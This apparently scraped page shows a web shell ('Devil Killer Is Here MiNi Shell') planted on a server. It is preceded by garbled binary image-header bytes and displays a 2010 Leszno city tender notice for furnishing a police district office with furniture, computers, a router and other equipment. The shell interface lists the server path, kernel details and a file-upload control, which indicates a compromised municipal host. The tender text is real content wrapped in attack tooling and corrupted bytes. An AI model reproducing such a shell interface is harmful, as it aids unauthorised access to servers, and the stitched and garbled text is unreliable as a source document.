JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101013/331140-N-2010.html

<p class="kh_header"><b>Leszno: Dostawa wyposażenia siedziby Rewiru Dzielnicowych Komendy Miejskiej Policji w Lesznie przy ul. Jana Kilińskiego nr 2</b><br>
<b>Numer ogłoszenia: 331140 - 2010; data zamieszczenia: 13.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Leszno, Urząd Miasta Leszna , ul. Kazimierza Karasia 15, 64-100 Leszno, woj. wielkopolskie, tel. 65 5298100, faks 65 5298131.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia siedziby Rewiru Dzielnicowych Komendy Miejskiej Policji w Lesznie przy ul. Jana Kilińskiego nr 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę i montaż mebli biurowych, komputerów z urządzeniami peryferyjnymi oraz urządzeń i sprzętu do utrzymania czystości.

1.Stół konferencyjny prostokątny  (DxSxW) 2500x1000x750, stelaż konstrukcja metalowa w kolorze aluminium  blat z płyty laminowanej o gr. minimum 25 mm w kolorze calvados - szt.  1	
2.Krzesła do stołu konferencyjnego. Tapicerowane siedzisko i oparcie, stelaż metalowy w kolorze aluminium - szt. 14		
3.Biurowe krzesła obrotowe z miękkim tapicerowanym i amortyzowanym siedziskiem. Płynna regulacja wysokości siedziska. Regulowana wysokość oparcia oraz głębokość siedziska. Tapicerka 100% włókna syntetyczne. Pięcioramienna podstawa wyposażona w kółka - szt. 9		
4.Fotel gabinetowy tapicerowany skórą . Amortyzacja siedziska oraz płynna regulacja jego wysokości za pomocą podnośnika pneumatycznego, mechanizm tilt.  Pięcioramienna podstawa wyposażona w kółka - szt. 1		
5.Biurko gabinetowe wykonane z płyty melaminowanej o wymiarach 1500x800x750. Posiadające z jednej strony trzy szuflady a z drugiej szafkę z półką, Szafka i szuflady wyposażone w zamki patentowe. Okleina w kolorze calvados - szt.  1
6.Szafa gabinetowa o wymiarach  1600mm x 400 mm x 1900 mm. Trzyczęściowa Zewnętrzne części na akta z 4 ruchomymi półkami i drzwiami zamykanymi na zamki patentowe , część środkowa - otwarty regał z czterema ruchomymi półkami. Okleina w kolorze calvados  - szt.  1		
7.Biurko wykonane z płyty meleminowanej o wymiarach 1400 mm x 700 mm x 750 mm wyposażone z jednej strony w trzy szuflady a drugiej w szafkę z półką,. Szafka i szuflady wyposażone w zamki patentowe. W środkowej części wysuwany pulpit na klawiaturę komputerową Okleina w kolorze calvados - szt.  10		
8.Stojak drewniany na komputer. Okleina jak biurka. - szt. 9		
9.Szafa biurowa aktowa  z 4 półkami ruchomymi, dwudrzwiowa o wymiarach  400 x 800 x 1900. wykonana z płyty meleminowanej w kolorze calvados. Drzwi zamykane na zamki patentowe  - szt.  3		
10.Regał na segregatory z czterema ruchomymi półkami wykonany z płyty grubości 28 mm melaminowanej. O wymiarach  800 mm x 400 mm x 1900. okleina w kolorze calvados  -  szt.  3		
11.Szafka o wymiarach 600 x 600 x 750 mm z czterema szufladami, z zamkiem centralnym. Wykonana z płyty meleminowanej	-  szt. 4		
12.Regał metalowy o stelażu otwartym i  wymiarach 1600x500x2000 , z pięcioma półkami. Do pomieszczenia magazynowego  -  kpl.  1		
13.Szafy odzieżowe o wymiarach 600 mm x 600 mm x 1900 mm z górną półką i drążkiem na wieszaki. Wykonane z płyty melaminowanej w kolorze calvados. Drzwi zamykane na zamek patentowy  - szt. 10		
14.Stół wraz z 4 krzesłami do pomieszczenia  jadalni, blat z płyty laminowanej o wymiarach 800mm x 800mm   -  kpl.  2		
15.Tablica korkowa w ramie o wymiarach 150cm x 90 cm do zawieszenia na ścianie 
    szt.	1		
16.Tablica suchościeralno-magnetyczna o wymiarach 120 cm x 90 cm, w kolorze białym z półką na markery, gąbkę i magnesy. Do zawieszenia na ścianie-szt. 1
17.Szafa metalowa na akcesoria do sprzątania o wymiarach 800x500x1900. Wewnątrz szafy przegroda , 5 półek po jednej stronie , 1 półka po drugiej stronie i drążek do wieszaków na odzież sprzątaczki.
Szafę wyposażyć w miotłę, 2 mopy,  2 wiadra plastikowe - kpl.  1		
18.Wózek na akcesoria do sprzątania, z dwoma koszami na środki czystości, uchwytem do mocowania worka na śmieci. Czterema  uchwytami na sprzęt do sprzątania i miejscem na dwa wiadra  - szt. 1		
19.0Odkurzacz elektryczny wraz z osprzętem. O parametrach technicznych i użytkowych równoważnych lub lepszych od odkurzacza firmy ZELMER typu Multipro 01Z013  - kpl. 1		
20.wycieraczka podłogowa wykonana z  włókna nylonowego, z antypoślizgowym gumowym podłożem. Wycieraczka o wymiarach ca 80 x  60 cm - szt. 1	
21.Metalowy wieszak wolnostojący w kolorze aluminium, na odzież  - szt. 4	
22.Wieszak na ubrania wraz z półką na nakrycia głowy. Mocowany do ściany o      szerokości 100 cm., z 6 haczykami  -  kpl.  1		
23.Chłodziarka wolnostojąca o pojemności 180 l	  - szt.	1		
24.Godło w ramie	- szt.  2		
25.Stojak rowerowy zewnetrzny na 4 rowery	- szt. 1		
26.Kosze na śmieci wolnostojące otwarte  -  szt. 5		
27. Kosze na śmieci wolnostojące z  zamknięciem  - szt. 	4		
28.Dostawa i montaż dozowników na mydło w płynie. Wykonane z tworzywa ABC o pojemności 800 ml. - szt.  4		
29.Dostawa i montaż pojemnika na papier  toaletowy,  z tworzywa ABS zamykany na kluczyk  -  szt.	 2		
30.Dostawa i montaż pojemników na pojedyncze ręczniki papierowe. Z tworzywa ABS zamykane na kluczyk  -  szt. 3		
31.Szczotki toaletowe  - szt. 2		
32.Lustro w ramie o wymiarach 70cm x 150cm	- szt.  1		
33.Dostawa lustra o wymiarach 60cm x 100 cm i montaż nad umywalkami w pomieszczeniu sanitarnym  - szt.  1		
34.Komputer PC  -  szt.  6     o konfiguracji:
- procesor  minimum dual core
- nagrywarka DVD
- dysk twardy minimum 1 TB
- pamięć RAM minimum 2 GB
- karta graficzna zintegrowana GMA X4500
- karta dźwiękowa zintegrowana
- karta sieciowa 10,100,1000 Mbit/s
  zintegrowana
- czytnik kart pamięci All in One wewnętrzny
- zasilacz minimum 300 W
- porty wejścia/wyjścia: 6 x USB 2,0 , RJ45, 
  wejście liniowe(stereo), wyjście liniowe
  PS-2 (klawiatura + mysz), D-Sub,  
- system operacyjny Windows XP  
  Professional lub nowszy
- pakiet biurowy OpenOffice  w polskiej
   wersji językowej
- klawiatura + mysz	

35.Komputer PC  -  szt.  3   o konfiguracji:
- procesor  minimum dual core
- nagrywarka DVD
- dysk twardy minimum 1 TB
- pamięć RAM minimum 2 GB
- karta graficzna zintegrowana GMA X4500
- karta dźwiękowa zintegrowana
- karta sieciowa 10,100,1000 Mbit/s
  zintegrowana
- czytnik kart chipowych wewnętrzny
  wymagania dla czytników kart: 
  1) czytnik kart musi być zgodny ze standardem PC-SC,
  2) czytnik musi posiadać oznakowanie (certyfikat) CE.
  3) czytnik musi być zgodny Microsoft WHQL (Windows Hardware Quality Labs)
      dla   systemów operacyjnych Windows 2000, Windows XP, Windows Vista,
      Windows 7, zgodność czytnika dla systemu operacyjnego Windows XP,  
      Windows Vista i Windows 7 musi być potwierdzona przez Microsoft WHQL.  
      Zamawiający musi otrzymać podpisany przez Wykonawcę wydruk ze strony
      internetowej Microsoft z takim potwierdzeniem (link do strony musi być
      widoczny na wydruku).
  4) w przypadku, gdy Wykonawca oferuje czytnik, którego nazwa nie jest tożsama
       z nazwą czytnika wymienionego na stronie Microsoft jest on zobowiązany do
       dostarczenia potwierdzenia zgodności oferowanego czytnika z Microsoft WHQL
       od firmy Microsoft.
  5) czytnik musi umożliwiać odczyt dostępnych na rynku kart kryptograficznych
      zgodnych z normą ISO - 7816, a w szczególności umożliwiać współpracę z
      kartą w standardzie PKCS#11 co najmniej w wersji 2.01,
  6) czytnik musi współpracować z oferowanymi na rynku kartami
      mikroprocesorowymi koniecznie z CRYPTOTECH MULTI SIGN, OBERTUR ID ONE
      ENCARD,
  7) czytnik musi współpracować z następującymi systemami operacyjnymi:
      Windows 2000, Windows XP, Windows Vista, Windows 7 i posiadać
      oprogramowanie umożliwiające tę współpracę. Do każdego urządzenia musi być
      dołączona instrukcja obsługi w języku polskim oraz płyta CD ze sterownikami do
      współpracujących systemów operacyjnych.
- zasilacz minimum 300 W
- porty wejścia/wyjścia: 6 x USB 2,0 , RJ45, wejście liniowe(stereo), wyjście liniowe
  PS-2 (klawiatura + mysz), D-Sub,  
- system operacyjny Windows XP Professional 
- pakiet biurowy Open Office w polskiej wersji językowej
- klawiatura + mysz	

36.Monitor kolorowy LCD  - szt. 9
    Przekątna ekranu minimum 22 cale technologia wykonania TN, spełniane normy
    jakościowe:
    - TUV-GS
    - TCO 2003
    - Energy Star
    - SEMKO, CSA, CE  	
	
37.Notebook  - szt. 1,   o konfiguracji:
- wyświetlacz LCD 15,6 cale rozdzielczość 1366x768, podświetlenie  LED
- procesor minimum dual core
- karta graficzna zintegrowana GMA 4500M
- karta sieciowa 10/100
- karta sieci bezprzewodowej 802.11 b/g/n
- wbudowana kamera internetowa,
- nagrywarka DVD
- dysk twardy 500 GB
- pamięć RAM minimum 2 GB
- wyjście karty graficznej HDMI,  D-Sub
- czytnik kart pamięci
- interfejsy 3 x USB 2,0
- system operacyjny Windows XP
  Professional lub nowszy
- oprogramowanie biurowe MS Office 2007
- pakiet biurowy OpenOffice w polskiej
   wersji językowej
- mysz
- czas pracy na akumulatorze co najmniej 3 godz.	

38. Router  -  szt. 1 , o konfiguracji:
     1.  Urządzenie modularne, posiadające min. 2 sloty do obsadzenia modułami 
          rozszerzeń;
     2.Musi posiadać co najmniej 2 porty LAN 10/100/1000 BaseT;
     3.Musi posiadać co najmniej 2 routowalne porty WAN 10/100 BaseT
     4.Musi posiadać co najmniej 1 port Serial oraz 1 kabel V35MT
     5.Musi posiadać co najmniej 1 GB RAM oraz 256 MB FLASH;
     6.Musi mieć możliwość montażu w szafie 19 cali, być zasilane prądem                
       przemiennym o napięciu 230V oraz posiadać obudowę z metalu oraz wysokość
       urządzenia nie może przekraczać 2U;
    7.Urządzenie musi posiadać oprogramowanie i licencje realizujące funkcjonalność 
       szyfrowania ruchu IPSec 3DES oraz AES z wydajnością nie mniejszą niż 170
       Mbp. Wymagana jest obsługa protokołu AES z kluczem 128-bitowym, 192-   
       bitowym lub 256-bitowym;
    8.Urządzenie musi zapewniać współpracę z serwerami certyfikatów cyfrowych:
       Entrust, Verisign, Microsoft i Baltimore Technologies;
    9.Urządzenie musi obsługiwać protokoły routingu dynamicznego: RIP/RIPv2,
       OSPF, EIGRP lub równoważny, IS-IS i BGP;
   10.Urządzenie musi obsługiwać ruch multicastowy  w szczególności: PIM
       sparse/dense/SSM/Bi-directional, IGMP;
   11.Urządzenie musi obsługiwać RPF (Reverse Path Forwarding);
   12.Urządzenie musi obsługiwać następujące protokoły i mechanizmy   
       bezpieczeństwa: SCEP, IKE keepalive, Radius, Tacacs, CHAP/PAP, MAC-MD5,
       MAC-SHA-1, NAC, CBAC, L2TP;
   13.Urządzenie musi posiadać funkcjonalność VRRP lub odpowiednik tej
       funkcjonalności;
   14.Zarządzenie musi być możliwie poprzez: CLI (Telnet, SSHv2, port konsoli),
       HTTPS, SNMPv3;
   15.Urządzenie musi posiadać niezbędne kable logiczne i energetyczne;
		
39.PenDrive  4 GB	- szt. 10		
40.Wielofunkcyjne urządzenie  biurowe zastępujące drukarkę, skaner, kopiarkę i fax
    szt.  1 
- technologia druku        -   atramentowa
- maks. rozmiar nośnika        -  A3
- rozdzielczość druku w czerni - 1200x6000
- rozdzielczość druku w kolorze-1200x6000 
- maks. szybkość druku mono - 35 str./min.
- maks. szybkość druku kolor - 28 str/min
- praca w sieci przewodowej i bezprzewodowej
- typ skanera - kolorowy
- rozdzielczość skanera - 1200x2400 dpi
- szybkość kopiarki w czerni - 23 str/min.
- szybkość kopiarki w kolorze - 20 str/min.
- rozdzielczość kopiarki - 1200x1200 dpi
- pojemność pamięci faksu - 400 str.
- szybkość transmisji faksu - 33,60 kbps
- bezpośredni wydruk fotografii z kart pamięci oraz aparatu 
- interfejs    - Ethernet 10/100 Mbps
- USB 2,0  
- Wi-Fi			
41.Drukarka laserowa czarno-biała, sieciowa  - szt.  5		
42.Telewizor LCD Full HD o przekątnej ekranu  minimum 32 cale, technologia 100 Hz
Wbudowany tuner DVB-T i DVB-C z dekoderem MPEG 4   AVC  -  szt.  1	
43.Płyta grzejna zabudowana na odpowiedniej szafce.  O parametrach technicznych i użytkowych równoważnych lub lepszych od płyty grzejnej PE 0720 firmy AMICA  -  szt.  1
44.Szafka kuchenna o wymiarach  800x600x750 z dwoma półkami i blatem pokrytym laminatem. Do przechowywania naczyń w  jadalni  - szt.  1	
45.Czajnik bezprzewodowy o pojemności ca 1,7 L z płaską grzałką. Automatyczny wyłącznik po zagotowaniu i zabezpieczenie przed włączeniem pustego czajnika. Filtr antywapniowy. Dno z płyty chromowo-niklowej  - szt.  2		
46.Aparat telefoniczny analogowy z funkcją FSK  -  szt.  10 
    wymagania funkcjonalno-użytkowe:
    1) podłączenie do centrali poprzez port  analogowy,
    2) 20-pozycyjny wyświetlacz zasilany poprzez port centrali umożliwiający
       wyświetlanie daty/godziny oraz numeru  wywołującego
    3) praca w trybie głośnomówiącym, 
    4) wyłącznik mikrofonu
    5) min. 10 przycisków szybkiego wybierania
    6) lista ostatnich 50 połączeń 			
47.Niszczarka biurowa   -  szt.  1
    - niszczy jednorazowo 12-14 kartek
    - może niszczyć dokumenty ze zszywkami i spinaczami, karty kredytowe
    - szerokość szczeliny wejściowej 240 mm
    - auto start/stop - funkcja cofania
    - poziom bezpieczeństwa DIN 3	
48.koszt transport i montażu wyposażenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.00.00.00-2, 39.22.43.00-1, 39.71.00.00-2, 39.71.11.00-0, 30.21.30.00-5, 30.21.31.00-6, 30.23.13.10-3, 30.23.21.10-8, 30.23.46.00-4, 30.23.21.30-4, 32.30.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiajacy żąda wniesienia wadium w kwocie 1000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwa zamówienia na dostawę mebli biurowych i sprzętu komputerowego oraz załączy dokumenty potwierdzające, że dostawy zostały wykonane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	oświadczenie że Wykonawca zapoznał się ze szczegółowymi warunkami przetargu zawartymi w niniejszej SIWZ oraz wzorem umowy i że akceptuje je bez zastrzeżeń (załącznik nr 3);
b)	oświadczenie że Wykonawca uważa się za związanego ofertą do terminu ważności oferty wskazanego w SIWZ i zobowiązuje się w przypadku wyboru jego oferty zawrzeć umowę (załącznik nr 3);
c)	oświadczenie że Wykonawcy znane są warunki wykonania zamówienia oraz posiada wszystkie informacje niezbędne do przygotowania oferty (załącznik nr 3);
d)	oświadczenie że Wykonawca zobowiązuje się do udzielenia 3 letniej gwarancji jakości i rękojmi za wady  na wykonane zamówienie (zał. Nr 3), 
e)	oświadczenie o realizacji zamówienia siłami własnymi albo wspólnie z innymi podmiotami w formie konsorcjum lub z udziałem podwykonawców. W przypadku realizacji zamówienia w formie konsorcjum lub z udziałem podwykonawców wówczas do oferty należy dołączyć dokumenty, o których mowa w rozdz. 10 ust. 2 i 3 odpowiednio do złożonego oświadczenia.
f)	jeżeli Wykonawca będzie polegać na potencjale innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków wówczas Wykonawca zobowiązany jest do udowodnienia iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia poprzez złożenie pisemnego zobowiązania podmiotów udostępniających swoje zasoby do oddania Wykonawcy do dyspozycji tych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	wystąpienia uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę , jeżeli zmiany te są korzystne dla Zamawiającego; 
2)	Dostosowania umowy do zmian powszechnie obowiązujących przepisów prawa mających wpływ na realizację
  		przedmiotu zamówienia, nie dotyczy wzrostu stawki podatku VAT ( wzrost stawki podatku VAT nie wpływa na
  	wysokość wynagrodzenia Wykonawcy. Koszty związane ze wzrostem stawki podatku VAT obciążają Wykonawcę;
3)	wystąpienia siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne , którego
  	nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;
       4)    z powodu działań osób trzecich uniemożliwiających wykonanie prac , które to działania nie są konsekwencją 
 		winy którejkolwiek ze stron;
	    5)   wprowadzenie lub zmiana podwykonawcy;
	    6)   przekształcenie lub zmiana siedziby którejkolwiek ze stron umowy;
	    7)   zmiana osób reprezentujących strony oraz innych osób z nazwiska wymienionych w umowie;
       8)  zajdą inne okoliczności niezależne od Wykonawcy, których nie można było przewidzieć w dniu zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.leszno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Leszna
ul. Kazimierza Karasia 15 
64-100 Leszno
pok.  34.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2010 godzina 10:00, miejsce: Urząd Miasta Leszna
ul. Kazimierza Karasia  15
64-100 Leszno 
pok.  34.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





